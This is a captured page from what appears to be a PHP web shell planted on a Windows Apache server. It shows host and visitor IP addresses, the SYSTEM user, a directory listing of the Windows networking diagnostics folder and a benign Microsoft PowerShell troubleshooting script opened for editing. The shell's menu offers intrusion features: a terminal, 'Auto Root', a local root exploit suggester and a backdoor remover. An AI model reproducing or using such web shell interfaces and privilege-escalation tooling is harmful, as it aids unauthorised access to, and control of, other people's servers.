Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Windows /
diagnostics /
system /
Networking /
Delete
Unzip
Name
Size
Permission
Date
Action
en-US
[ DIR ]
drwxrwxrwx
2023-03-23 12:54
pt-BR
[ DIR ]
drwxrwxrwx
2019-12-07 15:53
DiagPackage.diagpkg
163.1
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.dll
478.5
KB
-rw-rw-rw-
2023-11-16 03:01
HTInteractiveRes.ps1
951
B
-rw-rw-rw-
2019-12-07 10:09
InteractiveRes.ps1
770
B
-rw-rw-rw-
2019-12-07 10:09
NetworkDiagnosticSnapIn.dll
9.5
KB
-rw-rw-rw-
2023-11-16 03:01
NetworkDiagnosticsResolve.ps1
11.93
KB
-rw-rw-rw-
2019-12-07 10:09
NetworkDiagnosticsTroubleshoot.ps1
25.18
KB
-rw-rw-rw-
2022-09-18 10:15
NetworkDiagnosticsVerify.ps1
10.82
KB
-rw-rw-rw-
2019-12-07 10:09
StartDPSService.ps1
567
B
-rw-rw-rw-
2019-12-07 10:09
UtilityFunctions.ps1
53.41
KB
-rw-rw-rw-
2019-12-07 10:09
UtilitySetConstants.ps1
2.94
KB
-rw-rw-rw-
2019-12-07 10:09
Save
Rename
# Copyright � 2008, Microsoft Corporation. All rights reserved. PARAM($RepairName, $RepairText, $HelpTopicLink, $HelpTopicLinkText, $FailResolution) #Non NDF Help Topic Resolution (defined non-manual so we don't need to prompt the user to see the repair) #include utility functions . .\UtilityFunctions.ps1 Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData #the strings come in as raw resource strings, load the actual strings $repairNameStr = LoadResourceString $RepairName; $repairTextStr = LoadResourceString $RepairText; $helpTopicLinkTextStr = LoadResourceString $HelpTopicLinkText #display the help topic interaction Get-DiagInput -ID "IT_HelpTopicRepair" -Parameter @{"IT_P_Name"=$repairNameStr; "IT_P_Description"=$repairTextStr; "IT_P_HelpTopicText" = $helpTopicLinkTextStr; "IT_P_HelpTopicLink" = $HelpTopicLink;} if($FailResolution -eq "TRUE") { throw "Issue not resolved." }